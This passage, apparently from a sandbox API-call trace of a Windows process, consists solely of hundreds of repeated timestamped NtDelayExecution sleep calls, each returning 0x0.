(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0140.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.036] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.166] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.239] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.254] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0141.432] NtDelayExecution 